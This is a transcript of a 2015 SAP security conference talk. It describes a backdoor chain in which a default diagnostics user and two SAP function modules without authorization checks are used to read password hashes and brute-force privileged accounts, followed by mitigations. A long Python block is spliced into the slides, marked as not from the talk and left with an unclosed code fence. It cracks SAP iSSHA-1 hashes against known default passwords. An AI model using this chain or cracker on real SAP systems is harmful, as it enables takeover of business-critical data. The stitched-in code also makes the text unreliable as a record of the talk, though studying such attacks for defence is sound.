erp security joris-van_de_vis_sap_security_sitnl_2015_v0.2


Upload: jvandevis

Post on 14-Apr-2017


TRANSCRIPT

Page 1: Erp security joris-van_de_vis_sap_security_sitnl_2015_v0.2
Page 2

Introduction

Whoami

Page 3

Topics

- James Bond kind of espionage; it’s real
- A practical example of a backdoor
- SAP HANA security
- SAP Security baseline

Page 4

Not a sexy topic

SAP Security is not always a sexy topic. But…

Page 5

007, Secret service activities

• Corporate espionage

• State-sponsored espionage

• ‘Regular’ Cybercrime

• Political motivated cybercrime

• Backdoors

Page 6

James Bond kind of espionage; it’s real

Page 7

It’s China… they say…

Page 8

SAP and backdoors?

SAP building backdoors for the NSA. Far-fetched? Yes: strongly denied by SAP and, in my belief, also not true.

But what if there are backdoors that SAP or its customers are not aware of…? A practical example…

Page 9

The challenge:

In order to effectively secure an SAP platform, you need to understand and secure all of its systems, components, infrastructure layers and related vulnerabilities and threats.

To break an SAP platform you only need one flaw/vulnerability!

If you are the good guy, you have to work harder!


Page 10

A backdoor into SAP; you need one of these 3

So, to fully compromise an SAP system we need at least one of the following:

• Gain SAP_ALL rights on the application layer

• Get access to the operating system as <sid>adm

• Get access to the database, in particular the SAP schema

Getting access to one of the above means you have access to all three: SAP_ALL lets you run OS commands and SQL from the application server, <sid>adm owns the kernel binaries and the database connection the application uses, and the schema owner can rewrite any table, including the user and authorization tables.

Page 11

A backdoor into SAP…

In this scenario we will combine 3 vulnerabilities:

1. A Default user with default password for Diagnostics purposes

2. A Remote wrapper to execute local function modules remotely without authorization check

3. A Local function module to execute native SQL without authorization check

Business risk: leads to a full compromise of your business-critical data


Page 12

Some details on the 3 vulnerabilities

1. Default user with default password for diagnostics purposes

• User SMDAGENT_<SID> is used by the Wily host agent for gathering diagnostics

• It gets created via the Solution Manager “Managed System Configuration” in SolMan 7.0

• Exists not only in the Solution Manager, but also in the managed backend systems

2. Remote wrapper without authorization check

• Function module /SDF/GEN_PROXY can be used to execute local function modules remotely

• Lacks an authorization check

3. Local function module to execute native SQL without authorization check

• Function module /SDF/RBE_NATSQL_SELECT can be used to execute native SQL

• Lacks an authorization check

Page 13

Demo

1. Select password hashes from the database

2. Brute force privileged SAP accounts

3. Gain access to the SAP Solution Manager
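The step from “select password hashes” to “brute force privileged accounts” is where the chain turns into real damage, so here is an added, self-contained example of that offline step and of the triage a defender would run on the same data. It is not code from the talk or from ERP-SEC. The USR02 rows are constructed (hashes are generated in the script with fixed salts; no real credentials), the user and client names are hypothetical, and the CODVN H routine follows the iSSHA-1 construction as implemented in open-source password crackers (SHA-1 over password||salt, then iterated over digest||salt, packed as `{x-issha, N}base64(digest||salt)`); that construction is an assumption here and should be confirmed against a hash from your own system before you rely on it.

```python
"""Offline triage of a dumped USR02 table: spot the diagnostics user, spot
accounts still carrying a downward-compatible hash, and test which CODVN H
accounts fall to a small candidate list.  Added example, not from the talk.
Sample rows are constructed; the CODVN H routine is an assumed iSSHA-1
implementation (see the lead-in)."""
import base64
import hashlib
import os
import re

ISSHA_RE = re.compile(r"^\{x-issha, (\d+)\}(.+)$")
DIGEST_LEN = 20  # SHA-1 output size; the salt follows the digest in the blob


def issha1(password: str, salt: bytes, iterations: int) -> bytes:
    """CODVN H (PWDSALTEDHASH) digest: SHA-1(password || salt), then
    iterations-1 rounds of SHA-1(previous digest || salt).
    ASSUMPTION: construction as published by open-source crackers."""
    digest = hashlib.sha1(password.encode("utf-8") + salt).digest()
    for _ in range(iterations - 1):
        digest = hashlib.sha1(digest + salt).digest()
    return digest


def make_pwdsaltedhash(password: str, salt=None, iterations: int = 1024) -> str:
    """Build a PWDSALTEDHASH value in the '{x-issha, N}base64(digest||salt)' layout."""
    salt = salt if salt is not None else os.urandom(12)
    blob = issha1(password, salt, iterations) + salt
    return "{x-issha, %d}%s" % (iterations, base64.b64encode(blob).decode("ascii"))


def parse_pwdsaltedhash(value: str):
    """Return (iterations, digest, salt) from a PWDSALTEDHASH string."""
    m = ISSHA_RE.match(value.strip())
    if not m:
        raise ValueError("not an iSSHA-1 PWDSALTEDHASH value: %r" % value)
    blob = base64.b64decode(m.group(2))
    return int(m.group(1)), blob[:DIGEST_LEN], blob[DIGEST_LEN:]


def crack(value: str, candidates):
    """Offline guess: the first candidate whose iSSHA-1 matches the stored digest, else None."""
    iterations, digest, salt = parse_pwdsaltedhash(value)
    for cand in candidates:
        if issha1(cand, salt, iterations) == digest:
            return cand
    return None


# Widely documented historic SAP default passwords.  A real run would use a
# proper wordlist and a GPU cracker; 1024 rounds of SHA-1 is cheap.
DEFAULT_PASSWORDS = ["06071992", "19920706", "support", "admin", "PASSWORD", "pass"]

# Constructed rows in the shape a SELECT over USR02 returns through the
# unauthorised native-SQL path: (MANDT, BNAME, CODVN, hash column).
# Hashes are generated here with fixed salts so the run is deterministic.
SAMPLE_USR02 = [
    ("000", "SAP*", "H", make_pwdsaltedhash("06071992", b"saltsaltsalt")),
    ("000", "DDIC", "H", make_pwdsaltedhash("19920706", b"ddicsaltddic")),
    ("000", "SMDAGENT_PRD", "H", make_pwdsaltedhash("not-a-real-default", b"smdsmdsmdsmd")),
    ("100", "J.DOE", "B", "A2B1C3D4E5F60718"),  # legacy BCODE-style hash (constructed)
    ("100", "ADMIN_X", "H", make_pwdsaltedhash("Welcome1", b"adminsaltxxx")),
]


def triage(rows, candidates=DEFAULT_PASSWORDS) -> dict:
    """Flag what the chain in the talk goes after: the SMDAGENT_<SID> user,
    rows still carrying a non-CODVN-H (downward-compatible) hash, and
    CODVN H accounts that fall to the candidate list."""
    findings = {"smdagent": [], "legacy_hash": [], "cracked": {}}
    for mandt, bname, codvn, hashval in rows:
        if bname.startswith("SMDAGENT_"):
            findings["smdagent"].append((mandt, bname))
        if codvn != "H":
            # Older code versions (BCODE/PASSCODE) are far cheaper to crack;
            # check login/password_downwards_compatibility on such systems.
            findings["legacy_hash"].append((mandt, bname, codvn))
            continue
        hit = crack(hashval, candidates)
        if hit is not None:
            findings["cracked"][(mandt, bname)] = hit
    return findings


if __name__ == "__main__":
    for key, val in triage(SAMPLE_USR02).items():
        print(key, val)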

Page 14

Post-exploitation

From there?

• Use (trusted) RFC destinations to the rest of the landscape

• Use your imagination

• And take over the world

Try and take over the world!

Page 15

Mitigation

How to protect?

Change the password of, or delete, user SMDAGENT_<SID>

Apply OSS note 1774432 (CVSS score 4.6)

Apply OSS note 1727914 (CVSS score 7.5)

Monitoring / logging

Also see the SAP Whitepaper

https://scn.sap.com/docs/DOC-60424

Page 16

Something about HANA security…

[Chart: “SAP HANA Security notes” per year, 2011 through 2015; y-axis 0 to 18]

With great power comes great responsibility

Page 17

Running HANA? Better patch…

Page 18

SAP Security baseline

SAP Security baseline template

• Helps you when defining an SAP Security baseline

• Contains many settings to check

• Not only on the SAP application level, but also on the database, operating system, network and frontend level

The baseline can be accessed on the SAP Support site at https://support.sap.com/sos -> Media Library -> Security Baseline Template.

Page 19

Concluding

What I hope you learned today:

• SAP Security can be sexy

• Defenders have to work harder

• Don’t forget the systems of the ‘techies’: the SAP Solution Manager is a critical component when it comes to security

• Patch, patch, patch

• Check the SAP TechEd materials!

• Read and make use of the SAP Security Baseline document

Page 20

Questions?

Page 21

Website: www.erp-sec.com

Twitter: @jvis @erpsec

Need more info? Contact us...

Page 22

Disclaimer

SAP, R/3, ABAP, SAP GUI, SAP NetWeaver and other SAP products and services mentioned herein as well as their respective logos are trademarks or registered trademarks of SAP AG in Germany and other countries.

All other product and service names mentioned are the trademarks of their respective companies. Data contained in this document serves informational purposes only.

The authors assume no responsibility for errors or omissions in this document. The authors do not warrant the accuracy or completeness of the information, text, graphics, links, or other items contained within this material. This document is provided without a warranty of any kind, either express or implied, including but not limited to the implied warranties of merchantability, fitness for a particular purpose, or non-infringement.

The authors shall have no liability for damages of any kind including without limitation direct, special, indirect, or consequential damages that may result from the use of this document.

SAP AG is neither the author nor the publisher of this publication and is not responsible for its content, and SAP Group shall not be liable for errors or omissions with respect to the materials.

No part of this document may be reproduced without the prior written permission of ERP Security BV. © 2013 ERP Security BV.

Page 23

Thank you!

Page 24